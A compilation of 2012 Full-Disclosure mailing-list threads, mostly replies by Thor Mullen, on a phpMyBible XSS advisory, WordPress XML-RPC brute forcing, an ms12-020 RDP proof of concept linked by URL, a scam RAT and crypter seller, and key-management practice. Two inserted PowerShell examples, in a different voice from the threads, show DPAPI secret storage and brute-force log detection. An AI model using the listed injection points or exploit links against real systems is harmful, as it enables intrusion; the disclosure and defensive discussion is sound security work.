To: Milan Berger
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vulnerability in Gentoo hardened

On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said:

if you read his advisories and 0-days you know: It's not a joke...

I always thought it was misunderstood performance art...
Re: [Full-disclosure] phpMyBible 0.5.1 Multiple XSS
You dropped a FD on the BIBLE?? Dude, you're going straight to Hacker Hell! :)

Timothy Thor Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thomas Richards
Sent: Sunday, April 22, 2012 8:09 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] phpMyBible 0.5.1 Multiple XSS

# Exploit Title: phpMyBible 0.5.1 Multiple XSS
# Date: 04/15/12
# Author: G13
# Twitter: @g13net
# Software http://sourceforge.net/projects/phpmybible/?source=directory
# Version: 0.5.1
# Category: webapps (php)
#
# Description
# phpMyBible is an online collaborative project to make an e-book of the Holy Bible in as many languages as possible. phpMyBible is designed to be flexible to all readers while maintaining the authenticity and originality of the Holy Bible scripture.
#
# Vulnerability
# phpMyBible has multiple XSS vulnerabilities. When reading a section of the Bible, both the 'version' and 'chapter' variables are prone to reflective XSS.
#
# Exploit
# http://localhost/index.php?book=1&version=[XSS]&chapter=[XSS]
#
# Vendor Notification
# 04/15/12 - Vendor Notified
# 04/22/12 - No response, disclos
Re: [Full-disclosure] phpMyBible 0.5.1 Multiple XSS
I think MSFT would sue God if that's what he called it :) Time for a How Would Jesus Code bumper sticker!

Timothy Thor Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible

-Original Message-
From: valdis.kletni...@vt.edu [mailto:valdis.kletni...@vt.edu]
Sent: Sunday, April 22, 2012 5:23 PM
To: Thor (Hammer of God)
Cc: Thomas Richards; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] phpMyBible 0.5.1 Multiple XSS

On Sun, 22 Apr 2012 19:59:46 -, Thor (Hammer of God) said:

You dropped a FD on the BIBLE?? Dude, you're going straight to Hacker Hell! :)

Wait, wouldn't that require that the unerring Word of God was buggy? ;)
[Full-disclosure] Thor's Private Key
Please ignore (again). I need this key here to parse some FD archives.

?xml version=1.0? !--TGP - Thor's Godly Privacy: KeyFob XML Document-- KeyFobs /KeyHashPublicHashuTv/7E0oAF95nX6n55q0mpX71NBR1qFR9Ln9FYK18Jw=/PublicHashKeyNaCl7axIg9wHwSx/Xy9MK/g36w==/KeyNaCl/KeyFobName /KeyFobs
Re: [Full-disclosure] Thor's Private Key
You must not have read closely then :)

The GPG key structure is a collection of all keys in a single database. If you want to use different keys, you have to move entire keyrings around. Exportation of keys is in ascii, but you can't programmatically access any elements of the keys or the encrypted data itself with an open format. By default, the encrypted data is all binary, and if you ascii armor the actual data, you've got multiple steps to decrypt it and can't identify key information from it. GPG must be installed on target systems, and you have to be an administrator to do so. TGP runs as a single executable.

TGP has full access to the X.509 Windows Certificate Store and can validate PKI infrastructures based on these certificates. GPG can't even access the cert store. GPG has no provisions for key management at all. TGP interfaces with my Rainmaker API to provide off-site key management and verification based on permissions and certificate trusts. As such, the client never has to have the keys in their possession, and the keys never touch the file system. You can't do that with GPG.

TGP encrypted data is cloud ready for SOAP/XML-based API structures. You can't do that with GPG. TGP also is the only multi-platform encryption tool where you can encrypt the data on the PC, store it in the cloud, and then decrypt it on Win7Phone with even TGPMobile taking advantage of the Rainmaker API key management system. So for mobile applications you also never have the key on the device.

TGP is trivially easy to use. Average computer people can use it (and do). I've seen PGP/GPG deployments fail miserably because people couldn't figure out how to use GPG. Most importantly, I can make it do whatever I want it to do without having to parse through mounds of pieced together code authored by who knows who.

Those are some of the differences - not that it matters, of course. I've made no claims regarding any differences to GPG good or bad.
I comment about PGP on my site, but that's it. So feel free to LOL all day, but I really don't see what your point is. t -Original Message- From: Jason Hellenthal [mailto:jhellent...@dataix.net] Sent: Sunday, April 08, 2012 5:41 PM To: Thor (Hammer of God) Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Thor's Private Key LoL WuT! Whats the difference between just encrypting your data with GnuPG... and yes I read your about TGP page lol. On Sun, Apr 08, 2012 at 10:54:34PM +, Thor (Hammer of God) wrote: Please ignore (again). I need this key here to parse some FD archives. ?xml version=1.0? !--TGP - Thor's Godly Privacy: KeyFob XML Document-- KeyFobs KeyFobNameTGPFobNamePrivateTest/FobNamePublicKey/PublicKeyE ncPrivateKey193PM88EjC/C7DtVH/UWzI9ALhLyxr/vbeV95vGvVPlw5KKH3szdnzCMs 7cFWC7Hq2vqxIVwIDMrp9fG43mPnS1+Ya/96TmBk88gCcwdkkKlc4UDHDj73mEhvIra0P0 /L2VZDxX9rFbv2rEKMTKLXnW6dMSdJbfCN1AOI+jCsv+9pm7bcbSCRMaOJZoXUHjZiW1gp unUqi0zgbXYo10WGZJhfYa1uL9x4NuUjZ9P6m9haum8T1YQiV7+EZwbRl+9wD4bZ97pbP0 d7fikCJFw/0VaN2EJpgpzlxDEmTWpaAomKk/3gd4TAo+iM53XX3uwwL0g8yXWqgllZRLZS 9u5jS6ZPzNwhy8n4+FER7as4IpDZwOjg9vKNyBPYNN2xPOh6gOBKUZERRkuyp0zTyOZPTH 0D3/xlCqXlfhyqzntmxSpiCH2dzuhJR8Rj+LJcTTgzNsVNo2zSq9BfdTLZNsV5g2l/2PTe cA9DbDWrDQHBmMbSIbxqBLtxD+kVUm1XPf1C/5bhfbuZroCXGGgE6NykBpH5rThfRDV/7R cMqtd1d/2kIy0y5R0p9lsGKy3UHejuPP2x9KRWjb7en7GFnC9u3BE/92qOxJO1x98pdYn3 HS6QkmJKM1cvHhoxrowT8T87YEjK6o3J6s36xKW6kzTVS6AQMS8CfAb2lodheqvccREFUo PB/3n7BXbGT1gk9udApaaCcu8nNCsjDVfVMfYMuDk2SsJzkZvhOylsJNYmLrd9TuGOh7XT Dqi5GjT9Bg2rPFImxuuB5Y1kSag9Po2FKAfHIfxmDzPQQDo7wyclN5yrGmVCJOZfRZuFOQ cRh1t9p+F2eoe/zJJcN3BuMaCNyoEHx4ePDEtrCmYvvrSwCn7MBZM2qI/fZnuQp6SsbwyC znDub2wtx+Yjz4hoYnmDd3B2uY11WZ8Fd3NOHV9vcNhEfr2gjCyJoaSK2chiz1BJGWlI85 Gy1h9onf8wLxwNh6+S5HJ4PrDG8uF/SsDHIiODyWfwLtX/fVfdumNw1bINQMdSfJDw7ViH lmWuOlDaJHQY2soeI/mSB8Wem7551iS//jN4iCM8yJ0RDKay8d4HHRdGFyy4zGMVByzTOy AqH3k90eQjB+8DW8Jzo/Yi8mxYD1Z54aZycamhN2R9x3u08tf/AUdw0+nymbaksnQireZH 
6YIGNd2WutE2R/2/fGmDR0YebA4dP7KJ0NzKnLzFYnCY/WR9oxdKRHCa8pY1xvs+V722+q LHmI97bKkxWEnY+FkuxhlZiMDMIEpFTifoXlQlqVUQoqFgV2HZO7KeUZMtm2yzUvcKUeOj 2gHs0Qw9z0QxcMqe0Pp1k8ZqoSBqO7T4j3LHDkwwvfe8kp6ve9QhksYLnqI/5Gegu7/lz1 srwFo8+kbAMns/O55h5ISQOV5T7ElSgDEhQqDRFA3fdytgjZDFsB0JVkvb89dtJUU89qC9 fX08hg1YZzAdoyDsefRu5dAwOfOeXKVmVkbIUcEASm5/8k1gvdDEDy6gBl0u1xLOGYK0i3 liyLlOgWbPA3iEmYsGZyorRKn5q2sT/BVNQQTL9wdZiw3d8Zu0SiHpZyW98SfrOL3bHC0a xIK+VFd3sQXm98l6IV/hGoevr4zRFrWktiCnh5QG5viy4NcoqCcgkU514v4RUMjQMytEKQ hGgTOoJdAdutlD8B0nQ5pYExcecamlMhWwjujjw988b/GlQ9cnchGzLoSVxdgo2Xuvetxs FPnTzpl5kv4rLtnepAzfJbs4WQziLSUijK+BtnZVujpihFDkz2ZFMIcOiVaKLtl1kU2uBC ziw2WrBsq37CyzZZRhr9vNd4PWO6QBopPq4pPTM3llQ0nUrnGNDfmc05kSRxM4eiprKxGo BYdMJfOfcFPj49qbUb8TYtYz3Fgoc46cfwmVKGOQkJdSJzD8vVKj8BdguLGLf4s0IQrxnc LWGjOAic4nz7x /KeyFobs [Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy Thor Mullen www.hammerofgod.com
Re: [Full-disclosure] www.LEORAT.com is scam
It's called Karmaware.

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of smith joseph
Sent: Friday, March 30, 2012 6:54 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] www.LEORAT.com is scam

LEORAT.COM is SCAM | LEOIMPACT.COM is SCAM | LEORAT.COM is SCAM

Yes. I bought this RAT software from him. He claims that he is having his own RAT but they all are freeware. 1. Darkcomet 2. Xtream Rat - google it, even you can find better RAT free of cost on net. He will give you BOT which is again freely available on net. And last he uses Father Crypter to crypt all RAT output files, and this is pure bullshiz. All will be detected by Anti viruses after few hours.

Before buying they said they will be giving FUD server (Commercial Exploits Packs for Reliable Deployment in ZIP, EXE, Single XLS (office 2007), JPG+LNK, PDF File (9.3.0) Browser Pack) but nothing given. Once you start using it nothing goes according to his claimed way and fails. The only option you have left is KEEP EMAILING and CALLING. He will never respond to you again.. Bloody money sucker.

Result: LEOIMPACT.COM is SCAM LEORAT.COM is SCAM LEORAT.COM is SCAM
Re: [Full-disclosure] PcwRunAs Password Obfuscation Design Flaw
You've well-articulated a problem most (if not all) of the implementations I've seen just dance over. The application accomplishes the encryption requirements stipulated by policy or regulation, but the key is easily available to the application and of course to attackers.

I have no idea what mitigation techniques are available for PHP, but in .NET/Win applications there are a couple of first step attempts to at least address the problem. First you've got DPAPI, which in its simplest form is an API that allows the application to encrypt/decrypt data by way of keys stored in the system certificate store which is protected by a different set of credentials. The attacker would have to get system to get to the keys. Of course, if the attacker could alter code as you've outlined, then they could very well just use the API to decrypt data without worrying about getting the keys themselves.

The problem with DPAPI is that it is system-based. The data encrypted by that system can only be decrypted by that system. That won't work in distributed environments, and it can be problematic in system failure scenarios. To get past single-machine issues, there is another method called DKM, which as the name infers is a distributed key management system based on AD and the machines' membership in appropriate groups given access to the keys. So in a similar fashion, keys are protected by secondary credentials at the machine level. Again, this requires an attacker to gain system access to get the keys, but again, gives an attacker with file-level access where code can be changed access to the procedure calls to get the data if they have to.

It is a very difficult problem to solve, but it all comes down to risk management. If you are protecting against off-line attacks or attacks from other systems, DPAPI or DKM will definitely help. If you are protecting against attacks where SYSTEM access is granted, it gets far more difficult (one may even say quite improbable) to protect the keys.

What I've been doing myself is a bit different, but it ultimately suffers from the same potential issues: As part of my TGP suite, I've extended functionality to WinMobile so that data encrypted on the PC can be exchanged and decrypted on the phone. It's pretty cool actually... to get around the key management issues, I wrote an API where the devices authenticate to, and use certificates to gain access to the encrypted keys on a centralized key store. On the phone, the calls are made each time keys are needed. On my web servers, the call is actually made on application startup, storing the keys in memory. At any time one becomes aware of some breach, you can cut off access to the keys. Not ideal of course, but it works.

I'm not worried about the BSOD scenario. The remote attacker would have to cause a BSOD, and then somehow access the dump. In production systems, the page files are typically kept on another drive (well, maybe not typically but that is up to the admins) in which case the dump won't exist. But to your point, I just looked at my own web VM, and it is indeed set to do a full dump to the system drive. I still don't think there is enough of a risk of that type of breach to warrant changing the paradigm from system-only access to keys in memory.

I too would be interested in hearing what processes others are using to address this.

t

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of b
Sent: Tuesday, March 27, 2012 6:16 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] PcwRunAs Password Obfuscation Design Flaw

So this brings up an interesting problem to tackle: How can you encrypt things for use by applications, such as service account credentials for authentication to other systems and database access credentials on disk, in such a way that the application can obtain the encrypted information without prompting the end user for a decryption passphrase and an attacker with local filesystem access cannot obtain the encryption key to the credentials by simple computation (like if you had the encryption key calculated based on some static/easily guessable information)?

I have seen some attempts to solve this problem, such as with setting up SSL certs for apache's use: if the cert's private key is encrypted, you have to supply the private key decryption password at application startup and the key then lives in memory. This isn't very practical, in my opinion, in most environments I have seen because an unplanned outage could require system reboots by your monitoring personnel who might not know the application decryption passphrase and higher administrators have to be called in to start the services up properly. With web pages written in something like PHP, it would be even less practical because then you
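The DPAPI approach Thor describes for .NET/Windows, as an added example that is not code from the thread: a secret is protected with the .NET ProtectedData wrapper (DPAPI), written to disk, and the file is ACL'd so only SYSTEM and Administrators can read it. DPAPI keys are derived from the protecting account's credentials (CurrentUser scope) or the machine's credentials (LocalMachine scope), which is why a blob protected on one box cannot be unprotected on another; the catch block shows that failure mode. It assumes Windows PowerShell 5.1 on Windows; the file path, entropy string and password are constructed for the demo.

```powershell
# Added example, not from the thread: keeping an application credential at rest under DPAPI
# (the .NET ProtectedData wrapper around CryptProtectData). Assumes Windows PowerShell 5.1 on
# Windows; the path, entropy string and password below are constructed for the demo.
Add-Type -AssemblyName System.Security

# Optional entropy is mixed into DPAPI's key derivation. It separates this app's blobs from other
# blobs protected under the same account, but any code that can read this script can read it too.
$AppEntropy = [System.Text.Encoding]::UTF8.GetBytes('ExampleApp-entropy-v1')   # constructed

function Protect-AppSecret {
    param(
        [Parameter(Mandatory)][string]$PlainText,
        # CurrentUser: only this user on this machine. LocalMachine: any account on this machine,
        # which is what a service running under a service account usually needs.
        [System.Security.Cryptography.DataProtectionScope]$Scope = 'CurrentUser'
    )
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText)
    $blob  = [System.Security.Cryptography.ProtectedData]::Protect($bytes, $AppEntropy, $Scope)
    [Convert]::ToBase64String($blob)
}

function Unprotect-AppSecret {
    param(
        [Parameter(Mandatory)][string]$Base64Blob,
        [System.Security.Cryptography.DataProtectionScope]$Scope = 'CurrentUser'
    )
    $blob = [Convert]::FromBase64String($Base64Blob)
    try {
        $bytes = [System.Security.Cryptography.ProtectedData]::Unprotect($blob, $AppEntropy, $Scope)
        [System.Text.Encoding]::UTF8.GetString($bytes)
    } catch [System.Security.Cryptography.CryptographicException] {
        # The system-bound behaviour the thread describes: a LocalMachine blob copied to another
        # host, or a CurrentUser blob read by another account, fails here rather than decrypting.
        throw "DPAPI could not unprotect the blob on this host/account: $($_.Exception.Message)"
    }
}

function Write-ProtectedFile {
    param([Parameter(Mandatory)][string]$Path, [Parameter(Mandatory)][string]$Content)
    New-Item -ItemType Directory -Force -Path (Split-Path $Path) | Out-Null
    Set-Content -Path $Path -Value $Content -NoNewline
    # Defence in depth: DPAPI binds the blob to the machine; the ACL limits who can read it at all.
    $acl = Get-Acl -Path $Path
    $acl.SetAccessRuleProtection($true, $false)       # stop inheriting and drop inherited ACEs
    foreach ($id in 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators') {
        $rule = New-Object System.Security.AccessControl.FileSystemAccessRule($id, 'FullControl', 'Allow')
        $acl.AddAccessRule($rule)
    }
    Set-Acl -Path $Path -AclObject $acl
}

# Usage (run elevated): store a database credential for a service, then read it back.
$credPath = Join-Path $env:ProgramData 'ExampleApp\db.cred'      # constructed path
Write-ProtectedFile -Path $credPath -Content (Protect-AppSecret -PlainText 'demo-only-password' -Scope LocalMachine)
$recovered = Unprotect-AppSecret -Base64Blob (Get-Content -Path $credPath -Raw) -Scope LocalMachine
"Recovered: $recovered"
```

This covers the case the thread says it covers: offline theft of the file, or a copy taken to another system, yields nothing. It does not cover the case the thread concedes it cannot: code running on the same machine with SYSTEM (or, for CurrentUser scope, the service account's) rights can call Unprotect exactly as this script does, so the file ACL and limiting what runs under that account remain the real controls.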
Re: [Full-disclosure] Mexican Drug Cartels and Cyberspace
I seriously doubt the Mexican drug cartels would be kidnapping programmers. They'd be taking out their best clients.

t

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu
Sent: Monday, March 26, 2012 8:30 AM
To: Dave
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Mexican Drug Cartels and Cyberspace

On Mon, 26 Mar 2012 16:14:21 +0100, Dave said:

Looking forward to a Mexican standoff? Short-tempered and easily excited trigger-happy Mexican gangsters versus psychopathic Russian gangsters?

The proper time units for how long *that* standoff will last are usually found only in textbooks on subatomic physics. ;)
Re: [Full-disclosure] Apple IOS security issue pre-advisory record
Making a conclusion of community behavior, good or bad, based on some indication of a number of clicks on some link is a non sequitur. I actually don't see any reason why one would be surprised by a security community following links anyway. I've got a VM specifically used for this type of thing, and I know many others do as well. Many probably *want* the link to be malicious so they can analyze and harvest any potential attack and see if it is new or interesting. There is no corollary to qualified behavior from some ambiguous report that 300 security researchers who should have known better.

t

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of fulldisclos...@briaeros007.org
Sent: Monday, March 26, 2012 9:19 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Apple IOS security issue pre-advisory record

Hello,

I'm one of those who clicked on it (and to make matters worse: after it was discovered and discussed).

Why I clicked on it: it's a big thread and I wanted to begin the reading with the first post ^^.

The fact that I ran it on a noscript activated, up to date firefox doesn't change the fact that I ran it without too much attention and I'm the one to blame for it. So for the possible aggressive reactions: yes, but only about myself.

To be frank, the first thing I was thinking after seeing what the link was, was: well, owned like a newbie.

Cordially.
Re: [Full-disclosure] Brute Force vulnerability in WordPress
He knows there's nothing to any of these advisories – he just does it to drive traffic to his site for Google Ads.

t

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Zach C.
Sent: Sunday, March 25, 2012 5:05 PM
To: InterN0T Advisories
Cc: full-disclosure@lists.grok.org.uk; MustLive; submissi...@packetstormsecurity.org
Subject: Re: [Full-disclosure] Brute Force vulnerability in WordPress

He also considers it a vulnerability to tell a new user that the username they've picked out has been taken by another user.

On Sun, Mar 25, 2012 at 3:09 PM, InterN0T Advisories <advisor...@intern0t.net> wrote:

Same type of vulnerabilities exist in 99,999...% of all web applications including your website. Even if you can't bruteforce all the time, you can adjust it with timing, and e.g., proxies, different user-agents, etc., and then you have Timed Bruteforce Attacks which work on pretty much all websites.

Did you also mention this 5-10 years ago on your web site about website security named websitesecurity.com.ua?

Also, when will you stop posting about: bruteforce/full path disclosure/locking actual users out/and other low priority vulnerabilities that exist in most web apps, and completely move on to vulnerabilities that matter? Seriously, anyone can find these vulnerabilities and the reason why anyone hasn't reported / disclosed / complained about them is because they exist in most apps and don't compromise the security of the end-user nor the website. Will the next thing you disclose be about bruteforcing SSH because it by default doesn't lock users out? It's been like this for +10 or +20 years.

What I find funny is that either you:
A) Say a web app has a vulnerability because it doesn't lock the offending user out because of too many password tries, OR
B) Say a web app has a vulnerability because it does lock out the offending user because of too many password tries.

It's almost a contradiction and an endless evil circle. You can't have both, ever.

No offense intended of course.

Best regards,
MaXe

On Sun, 25 Mar 2012 23:45:33 +0300, MustLive <mustl...@websecurity.com.ua> wrote:

Hello list!

There are many vulnerabilities in WordPress which exist from version 2.0, or even from 1.x versions, and are still not fixed. So I want to warn you about one of such holes. It's a Brute Force vulnerability via XML-RPC functionality in WordPress.

Affected products:
Vulnerable are WordPress 3.3.1 and previous versions.

Details:
Brute Force (WASC-11):
http://site/xmlrpc.php

In this functionality there is no protection against Brute Force attacks. By sending corresponding POST-requests it's possible to pick up the password.

Note that since WordPress 2.6 the XML-RPC functionality is turned off by default. WP developers did it due to vulnerabilities (such as SQL Injection and others) which were found in this functionality, i.e. not motivating it as counteraction to Brute Force, but it worked also as protection against Brute Force attacks. So this issue doesn't concern those who use WordPress since version 2.6 with default settings. But those who need to use XML-RPC will have the Brute Force vulnerability, because the developers didn't make reliable protection against it.

Earlier, in 2008 and 2010, I already wrote about Brute Force vulnerabilities in WordPress (http://websecurity.com.ua/2007/ and http://websecurity.com.ua/4016/, SecurityVulns ID: 10677) and this is another such vulnerability. Besides them there is also a known BF attack not via the login form, but using the authorization cookie (when by setting different cookies it's possible to pick up the password).

Timeline:
2012.03.20 - disclosed at my site.

I mentioned this vulnerability at my site (http://websecurity.com.ua/5723/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
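MustLive's point is that xmlrpc.php takes credentials on every call with no lockout or rate limit, so the defender's signal is request volume rather than HTTP status. As an added example that is not part of the advisory or the thread, the script below parses combined-format access log lines, keeps POSTs to /xmlrpc.php, and flags any source address that exceeds a threshold inside a sliding time window. The log lines, addresses, window and threshold are constructed for the demo; adjust them to the site's normal traffic before using the logic for real.

```powershell
# Added example, not part of the advisory or the thread: detect password-guessing bursts against
# WordPress's xmlrpc.php in combined-format access logs. The sample lines below are constructed.

$LinePattern = '^(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3}) (?<bytes>\S+)'

function ConvertFrom-AccessLogLine {
    param([Parameter(Mandatory)][string]$Line)
    if ($Line -notmatch $LinePattern) { return $null }
    # Apache writes the zone as +0000; .NET's zzz specifier expects +00:00
    $ts = $Matches.ts -replace '([+-]\d\d)(\d\d)$', '$1:$2'
    [pscustomobject]@{
        Ip     = $Matches.ip
        Time   = [DateTimeOffset]::ParseExact($ts, 'dd/MMM/yyyy:HH:mm:ss zzz', [cultureinfo]::InvariantCulture)
        Method = $Matches.method
        Path   = ($Matches.path -split '\?')[0]
        Status = [int]$Matches.status
    }
}

function Find-XmlRpcBursts {
    param(
        [Parameter(Mandatory)][string[]]$Lines,
        [int]$WindowSeconds = 60,
        [int]$Threshold = 10
    )
    # A failed XML-RPC login is answered with HTTP 200 and a <fault> in the body, so the status
    # code cannot separate a guess from a legitimate call; count request volume per source instead.
    $hits = $Lines | ForEach-Object { ConvertFrom-AccessLogLine $_ } |
        Where-Object { $_ -and $_.Method -eq 'POST' -and $_.Path -eq '/xmlrpc.php' }

    foreach ($group in ($hits | Group-Object Ip)) {
        $times = @($group.Group | Sort-Object Time | ForEach-Object { $_.Time })
        $start = 0
        for ($end = 0; $end -lt $times.Count; $end++) {
            # slide the window start forward until it is within WindowSeconds of the current request
            while (($times[$end] - $times[$start]).TotalSeconds -gt $WindowSeconds) { $start++ }
            $count = $end - $start + 1
            if ($count -ge $Threshold) {
                [pscustomobject]@{
                    Ip          = $group.Name
                    Requests    = $count
                    WindowStart = $times[$start]
                    WindowEnd   = $times[$end]
                }
                break   # one alert per source is enough here
            }
        }
    }
}

# Constructed sample: 12 POSTs in about 30 seconds from one address, plus benign traffic
$SampleLog = @(
    0..11 | ForEach-Object { '203.0.113.7 - - [20/Mar/2012:10:00:{0:D2} +0000] "POST /xmlrpc.php HTTP/1.1" 200 389 "-" "Mozilla/5.0"' -f ($_ * 2) }
    '198.51.100.5 - - [20/Mar/2012:10:00:05 +0000] "POST /xmlrpc.php HTTP/1.1" 200 389 "-" "WordPress/3.3.1"'
    '198.51.100.9 - - [20/Mar/2012:10:00:07 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'
)

Find-XmlRpcBursts -Lines $SampleLog -WindowSeconds 60 -Threshold 10 | Format-Table -AutoSize
```

Only 203.0.113.7 is reported; the single post from 198.51.100.5 (a pingback-style client) stays under the threshold. Legitimate XML-RPC clients (mobile apps, pingbacks) are bursty too, so tune the threshold per site, and where the endpoint is not needed at all the simplest fix is the one the advisory itself notes: leave XML-RPC disabled.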
Re: [Full-disclosure] is my ISP lying or stupid?
Actually, those promiscuous sub-VLANs are bad news. I got a virus from one that turned my hard drive into a floppy.

t

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Giles Coochey
Sent: Wednesday, March 21, 2012 8:49 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] is my ISP lying or stupid?

On 2012-03-18 16:09, James Condron wrote:
> The routers of an ISP are sorta DHCP in the sense that the IPs are dynamic - DHCP really works as one network whereas an ISP switch will have a series of /30 vlans for obvious reasons. Getting an IP and connection is more complex than that but already we're down to a series of routers.

No, they'd use private VLANs with the default router in a promiscuous sub-VLAN. That way they won't have to waste 4 IPs for every customer. Customers with multiple IPs can be put in community sub-VLANs, if they pay for it.

Networking works very differently within Service Provider networks. A lot of it is technology that makes itself look like other technologies you might be familiar with, but what is happening behind the scenes is actually completely different.

Just thought you might like to know.
Re: [Full-disclosure] ms12-020 PoC
You establish a connection to TSGateway via RPC over HTTP in an SSL tunnel. Once you are authenticated and authorized, the TSGateway server will establish a connection via RDP to the target server, tunneling the RDP connection back to you within the RPC/HTTP(S) channel. As such, TSGateway is obviously unaffected by this vulnerability.

For those of you looking for mitigation and not kiddie code to pop a box, note that simply using NLA mitigates both RDP issues.

This might be a good time to point out that anyone who followed any of my advice in the RDP chapter of Thor's Microsoft Security Bible, or who is using the little ThoRDP tool I wrote (also in the book), was protected from these vulnerabilities way before they were discovered. I say that to simply identify that some simple, effective techniques can be deployed that thwart the hours and hours people put into developing exploit code and the wasted time chasing all this stuff down. *THAT* is what security is about, btw.

t

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Nahuel Grisolía
Sent: Friday, March 16, 2012 11:41 AM
To: root
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] ms12-020 PoC

Guys,

What about TS Gateway? which is actually listening on port 443 (by def)...

thanks!
Nahu.

On 16 March 2012 15:12, root ro...@fibertel.com.ar wrote:
> The SABU code is fake (go figure). This python script is the first port of the Luigi code to python, that's why it sucks. Here are better ports:
> http://pastebin.com/4FnaYYMz and http://pastebin.com/jzQxvnpj
>
> On 03/16/2012 02:50 PM, Exibar wrote:
>> Is that the same code from yesterday? I thought that code was a fake and didn't do anything? Anyone confirm this?
>>
>> Exibar
>> Sent via BlackBerry by AT&T
>>
>> -----Original Message-----
>> From: kyle kemmerer krkemme...@gmail.com
>> Sender: full-disclosure-boun...@lists.grok.org.uk
>> Date: Fri, 16 Mar 2012 12:01:16
>> To: full-disclosure@lists.grok.org.uk
>> Subject: [Full-disclosure] ms12-020 PoC
Re: [Full-disclosure] ms12-020 PoC
P.S. Before someone starts accusing me of spamming for the book (one asshat tried to compare me to Juan whats-his-face once), note you can actually view most of the RDP chapter (and others) on the Amazon "preview a page" feature if you would like. If you are interested in RDP security, I suggest you take a free read on Amazon. Many are worried about worm activity from 020, and I am far more interested in pointing you to free material that helps you secure yourself and others than I am trying to make a buck on the book. If anyone has any questions about how any of this works, I'm happy to help if I can.

t

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God)
Sent: Sunday, March 18, 2012 9:21 AM
To: Nahuel Grisolía; root
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] ms12-020 PoC
Re: [Full-disclosure] ms12-020 PoC
They did last time... But your advice is actually well noted :)

-----Original Message-----
From: James Condron [mailto:ja...@zero-internet.org.uk]
Sent: Sunday, March 18, 2012 10:06 AM
To: Thor (Hammer of God); full-disclosure-boun...@lists.grok.org.uk; full-disclos...@lists.grok.org.uk
Subject: Re: [Full-disclosure] ms12-020 PoC

Nobody said a word. Relax more and you might live long enough to write your next book.

Sent using BlackBerry® from Orange

-----Original Message-----
From: Thor (Hammer of God) t...@hammerofgod.com
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Sun, 18 Mar 2012 17:03:25
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] ms12-020 PoC
Re: [Full-disclosure] Fw: Earth to Facebook
Why not just provide them with the contact and they can forward it on directly? Then you could obviate the entire trust issue...

t

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of upsploit advisories
Sent: Sunday, March 18, 2012 1:56 PM
To: Michal Zalewski
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Fw: Earth to Facebook

The only other people that see the vulnerability are the select few in upSploit. However if the vendor is already in the upSploit database the advisory gets submitted straight away to the vendor. If you want to try it out there should be an upSploit vendor in the vendor list. Submit some advisories there. There is no ploy - like anything it is about trust. I created the service because when I first started I found it hard to find contacts sometimes. Use it if you want, don't if you don't. Simple as that really! Use it once for something you may not care about too much and see how it works for you.

Thanks,

On 18 March 2012 20:22, Michal Zalewski lcam...@coredump.cx wrote:
>> Without meaning to advertise, that is one of the reasons upSploit was created - so that you could submit a vulnerability and then upSploit automatically sends to the vendor. This way you and your friend don't have to do any of the work on the disclosure.
>
> I clicked around and don't see any obvious explanation; other than the reporter and the vendor, who else gets to see the submissions and under what circumstances?
>
> /mz
Re: [Full-disclosure] is my ISP lying or stupid?
Exactly.

t

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Peter Maxwell
Sent: Saturday, March 17, 2012 8:28 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] is my ISP lying or stupid?

What makes you think those services would be split onto separate switches (which would be rather odd actually)?

On 16 March 2012 16:30, Jerry dePriest jerr...@mc.net wrote:
> They had a DoS of mail, www and shell. They state a switch went out. Who runs mail, www and shell on the same switch? (This might be a trick question, think it thru...)
>
> bma
Re: [Full-disclosure] when did piracy/theft become expression of freedom
-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu
